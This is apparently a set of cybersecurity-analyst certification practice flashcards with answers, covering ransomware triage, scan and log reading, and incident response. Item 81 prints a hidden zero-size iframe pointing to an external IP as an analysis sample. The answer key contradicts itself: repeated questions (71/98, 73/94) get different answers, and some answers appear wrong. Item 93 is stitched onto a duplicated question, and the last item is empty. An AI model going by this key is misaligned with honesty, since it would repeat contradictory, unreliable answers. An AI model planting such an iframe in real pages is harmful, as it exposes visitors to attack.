After reviewing security logs, it is noticed that sensitive data is being transferred over an insecure network. Which of the following would a cybersecurity analyst BEST recommend that the organization implement? A Use a VPN. B Update the data classification matrix. C Segment the networks. D Use a FIM. E Use a digital watermark.

A

A Use a VPN.

66
Q

The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:

Locky.js
xerty.ini
xerty.lib

Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? A Disable access to the company VPN B Move the files from the NAS to a cloud-based storage solution C Set permissions on file shares to read-only D Add the URL included in the .js file to the company’s web proxy filter

A

D Add the URL included in the .js file to the company’s web proxy filter

67
Q

A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would be appropriate to use in this case? A MBSA B SHA1sum C FIM D DLP

A

C FIM

68
Q

After reading about data breaches at a competing company, senior leaders in an organization have grown increasingly concerned about social engineering attacks. They want to increase awareness among staff regarding this threat, but do not want to use traditional training methods because they view these methods as ineffective. Leadership wants to focus particular attention on potential attackers’ use of reconnaissance techniques and information gathering attempts. Which of the following approaches would BEST meet the requirements? A Classroom training on the dangers of social media followed by a test and gift certificates for employees getting a perfect score B Simulated phishing emails asking employees to reply to the email with their updated phone number and office location C A poster contest to raise awareness of PII and asking employees to provide examples of data breaches and consequences D USB drives randomly placed inside and outside the organization that contain a pop-up warning to any users who plug the drive into their computer

A

D USB drives randomly placed inside and outside the organization that contain a pop-up warning to any users who plug the drive into their computer

69
Q

During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following should be shown to the officer? A Letter of engagement B Scope of work C Timing information D Team reporting

A

B Scope of work

70
Q

As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause? A The vulnerability scanner should have utilized a credentialed scan. B The OWASP Top 10 does not include methods to detect this class of vulnerability. C The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS. D The application is not subject to PCI, so it doesn’t need to be scanned at the network layer.

A

B The OWASP Top 10 does not include methods to detect this class of vulnerability.

71
Q

An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following:

● The source of the breach is linked to an IP located in a foreign country.
● The breach is isolated to the research and development servers.
● The hash values of the data before and after the breach are unchanged.
● The affected servers were regularly patched, and a recent scan showed no vulnerabilities.

Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO) A The confidentiality of the data is unaffected. B The threat is an APT. C The source IP of the threat has been spoofed. D The integrity of the data is unaffected. E The threat is an insider.

A

B The threat is an APT. D The integrity of the data is unaffected.

72
Q

A security analyst is monitoring authentication exchanges over the company’s wireless network. A sample of the Wireshark output is shown below:

No    Time       Source         Destination    Protocol  Info
1345  191.12345  Cisco_91:aa    Netgear_a5:ef  EAP       Request, Identity
1350  191.12456  Netgear_a5:ef  Cisco_91:aa    EAP       Response, Identity
1355  191.12678  Cisco_91:aa    Netgear_a5:ef  EAP       Request, LEAP
1360  191.12890  Netgear_a5:ef  Cisco_91:aa    TLSv1.1   Client Hello
….
2145  193.12345  fooHost        barServer      TCP       GET ./login.jsp
2150  193.12456  barServer                     TCP       TCP Source port:80
…

Which of the following would improve the security posture of the wireless network? A Using PEAP instead of LEAP B Using SSL 2.0 instead of TLSv1.1 C Using .aspx instead of .jsp D Using UDP instead of TCP

A

A Using PEAP instead of LEAP

73
Q

In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the previous human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these particular files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO) A Unauthorized data exfiltration B Unauthorized data masking C Unauthorized access D Unauthorized software E Unauthorized controls

A

A Unauthorized data exfiltration C Unauthorized access

74
Q

A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid? A Access control policy B Account management policy C Password policy D Data ownership

A

C Password policy

75
Q

Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds

Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:34 EDT
Interesting ports on host adminServer (192.168.1.15):
PORT      STATE  SERVICE
22/tcp    open   ssh
139/tcp   open   netbios-ssn
3306/tcp  open   mysql
Service detection performed.
Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds

Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:35 EDT
Interesting ports on host opsServer (192.168.1.16):
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
139/tcp   open   netbios-ssn
1417/tcp  open   OpenSSH
Service detection performed.
Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds

Which of the following servers is out of compliance? A finServer B adminServer C orgServer D opsServer

A

D opsServer

76
Q

An analyst is conducting a log review and identifies the following snippet in one of the logs:

Jun 10 07:09:10 databse1 sshd[24665]: Invalid user root from 101.79.130.213
Jun 10 07:36:03 databse1 sshd[24901]: Invalid user root from 101.79.130.213
Jun 10 07:42:44 databse1 sshd[24938]: Invalid user root from 101.79.130.213
Jun 10 07:56:11 databse1 sshd[26570]: Invalid user root from 101.79.130.213
Jun 10 08:02:55 databse1 sshd[30144]: Invalid user root from 101.79.130.213

Which of the following MOST likely caused this activity? A SQL injection B Privilege escalation C Forgotten password D Brute force

A

D Brute force

77
Q

An organization has a practice of running some administrative services on non-standard ports as a way of frustrating any attempts at reconnaissance. The output of the latest scan on host 192.168.1.13 is shown below:

Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00066s latency).
Not shown: 990 closed ports
PORT      STATE  SERVICE
23/tcp    open   ssh
111/tcp   open   rpcbind
139/tcp   open   netbios-ssn
1417/tcp  open   OpenSSH
3306/tcp  open   mysql
MAC Address: 01:AA:FB:23:21:45
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds

Which of the following statements is true? A Running SSH on the Telnet port will now be sent across an unencrypted port. B Despite the result of the scan, the service running on port 23 is actually telnet and not SSH, and creates an additional vulnerability. C Running SSH on port 23 provides little additional security from running it on the standard port. D Remote SSH connections will automatically default to the standard SSH port. E The use of OpenSSH on its default secure port will supersede any other remote connection attempts.

A

C Running SSH on port 23 provides little additional security from running it on the standard port.

78
Q

A cybersecurity analyst is currently checking a newly deployed server that has an access control list applied. When conducting the scan, the analyst received the following code snippet of results:

Mail Server1
Trying 192.168.2.2
Connected
GET / HTTP/1.0
HTTP/1.0 200 Document follows
Server: server/0.10
Connection: close
Set-cookie: testing=1; path=/

Which of the following describes the output of the scan? A The analyst has discovered a false positive, and the status code is incorrect, providing an OK message. B The analyst has discovered a true positive, and the status code is correct, providing a file not found error message. C The analyst has discovered a true positive, and the status code is incorrect, providing a forbidden message. D The analyst has discovered a false positive, and the status code is incorrect, providing a server error message.

A

A The analyst has discovered a false Positive, and the status code is incorrect providing an OK message.

79
Q

Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario? A Continue to monitor security devices. B Update antivirus and malware definitions. C Provide security awareness training. D Migrate email services to a hosted environment.

A

C Provide security awareness training.

80
Q

A security analyst received an email with the following key: Xj3XJ3LLc A second security analyst received an email with the following key: 3XJ3xjcLLC The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example of: A dual control B private key encryption C separation of duties D public key encryption E two-factor authentication

A

E two-factor authentication

81
Q

A cybersecurity analyst was asked to review several results of web vulnerability scan logs. Given the following snippet of code:

<iframe src="http://65.240.22.1" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden; display:none"></iframe>

Which of the following BEST describes the situation and recommendations to be made? A The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name. B The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present. C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page. D The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

A

C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.

82
Q

A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement the corrective control. Which of the following would be the MOST inhibiting to applying the fix? A Requiring a firewall reboot B Resetting all administrator passwords C Business process interruption D Full desktop backups

A

C Business process interruption

83
Q

The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premises implementation. A critical application that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST? A Develop a request for proposal B Perform a risk assessment C Review current security controls D Review the SLA for FISMA compliance

A

B Perform a risk assessment

84
Q

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring? A Security regression testing B User acceptance testing C Input validation testing D Static code testing

A

B User acceptance testing

85
Q

A human resources employee sends out a mass email to all employees that contains their personnel records. A security analyst is called in to address the concern of the human resources director on how to prevent this from happening in the future. Which of the following would be the BEST solution to recommend to the director? A Install a data loss prevention system, and train human resources employees on its use. Provide PII training to all employees at the company. Encrypt PII information. B Enforce encryption on all emails sent within the company. Create a PII program and policy on how to handle data. Train all human resources employees. C Train all employees. Encrypt data sent on the company network. Bring in privacy personnel to present a plan on how PII should be handled. D Install specific equipment to create a human resources policy that protects PII data. Train company employees on how to handle PII data. Outsource all PII to another company. Send the human resources director to training for PII handling.

A

A Install a data loss prevention system, and train human resources employees on its use. Provide PII training to all employees at the company. Encrypt PII information.

86
Q

A software engineer has resigned and given two weeks’ notice. The organization is concerned the engineer may have taken proprietary code. Which of the following will BEST help the security analysts to determine if any code has been exfiltrated? A Terminate and immediately escort the engineer out of the building. B Develop a timeline of the engineer’s system and network activity. C Investigate when projects were checked out of the code repository by the engineer. D Dump the contents of RAM from the engineer’s workstation and review.

A

B Develop a timeline of the engineer’s system and network activity.

87
Q

During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the media, the responder should initiate: A malware scans B secure communication C chain of custody forms D decryption tools

A

C chain of custody forms

88
Q

A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is moved from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle? A Journaling B Hashing utilities C Log viewers D OS and process analysis E IOC tagging

A

E IOC tagging

89
Q

A company wants to replace its existing security infrastructure, including the firewall, IPS, and vulnerability scanner. A demo scanner from the new vendor is deployed. The analyst scans a device with the demo and legacy scanners and compares the results:

Vulnerability                          Legacy Scanner  Demo Scanner
Chrome < 44.3.1532.34                  X
Chrome < 43.7.9786.72                  X
Adobe Reader < 10                      X
Microsoft SMB Remote Code Execution    X               X
Apache < 2.4                           X               X

Which of the following is MOST likely responsible for the discrepancy in results? A The demo scanner needs to be configured to run a credentialed scan. B The demo scanner needs to be configured as an exception in the IPS. C The demo scanner is cloud-based and cannot identify local vulnerabilities. D The legacy scanner is producing false positives and should be replaced.

A

A The demo scanner needs to be configured to run a credentialed scan.

90
Q

An analyst was investigating an attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE) A RBAC B LEAP C DAC D PEAP E MAC F SCAP G BCP

A

A RBAC C DAC E MAC

91
Q

The security team for a large, international organization is developing a vulnerability management program. The development staff has expressed concern that the new program will cause service interruptions and downtime as vulnerabilities are remedied. Which of the following should the Security team implement FIRST as a component of the remediation process to address this concern? A Automated patch management B Change control procedures C Security regression testing D Isolation of vulnerable servers

A

C Security regression testing

92
Q

A worm was detected on multiple PCs within a remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describe this recommendation? A Logical isolation of the remote office B Sanitization of the network environment C Segmentation of the network D Secure disposal of affected systems

A

A Logical isolation of the remote office

93
Q

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred.

False Positive Findings Listing 1
Critical (10.0) 12209 Security Update for Microsoft Windows (835732)
Critical (10.0) 13852 Microsoft Windows Task Scheduler Remote Overflow (841873)
Critical (10.0) 18502 Vulnerability in SMB Could Allow Remote Code Execution (896422)
Critical (10.0) 58662 Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows (20161146)
Critical (10.0) 19407 Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423)

False Positive Findings Listing 2
Critical (10.0) 19407 Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423)
Critical (10.0) 11890 Ubuntu 5.04 / 5.10 / 6.06 LTS : Buffer Overrun in Messenger Service (CVE-2016-8035)
Critical (10.0) 27942 Ubuntu 5.04 / 5.10 / 6.06 LTS : php5 vulnerabilities (CVE-2016-362-1)
Critical (10.0) 27978 Ubuntu 5.10 / 6.06 LTS / 6.10 : gnupg vulnerability (CVE-2016-3931)
Critical (10.0) 28017 Ubuntu 5.10 / 6.06 LTS / 6.10 : php5 regression (CVE-2016-4242)

False Positive Findings Listing 3
WARNING (1.0.1) System cryptography: Force strong key protection for user keys stored on the computer: Prompt the User each time a key is first used
INFORM (1.2.4) Network access: Do not Allow anonymous enumeration of SAM accounts: Enabled
INFORM (1.2.4) Network access: Do not Allow anonymous enumeration of SAM accounts and shares: Enabled
INFORM (1.5.0) Network access: Let Everyone permissions apply to anonymous users: Disabled
INFORM (1.6.5) Network access: Sharing and security model for local accounts: classic – local users authenticate as themselves

The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:

Locky.js
xerty.ini
xerty.lib

Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? A Disable access to the company VPN B Move the files from the NAS to a cloud-based storage solution C Set permissions on file shares to read-only D Add the URL included in the .js file to the company’s web proxy filter

A

D Add the URL included in the .js file to the company’s web proxy filter

94
Q

In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the previous human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these particular files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO) A Unauthorized data exfiltration B Unauthorized data masking C Unauthorized access D Unauthorized software E Unauthorized controls

A

C Unauthorized access D Unauthorized software

95
Q

A cybersecurity analyst is capturing an image of a machine that is possibly infected with malware. During which of the following incident response phases does that occur? A Eradication B Analysis C Recovery D Post-incident

A

B Analysis

96
Q

An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST? A Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated. B Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data. C Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted. D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

A

D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

97
Q

A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the web server. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used? A APT B Zero-day attack C Man-in-the-middle attack D XSS

A

A APT

98
Q

An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following:
● The source of the breach is linked to an IP located in a foreign country.
● The breach is isolated to the research and development servers.
● The hash values of the data before and after the breach are unchanged.
● The affected servers were regularly patched, and a recent scan showed no vulnerabilities.
Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO) A The confidentiality of the data is unaffected. B The threat is an APT. C The source IP of the threat has been spoofed. D The integrity of the data is unaffected. E The threat is an insider.

A

A The confidentiality of the data is unaffected. D The integrity of the data is unaffected.

99
Q
A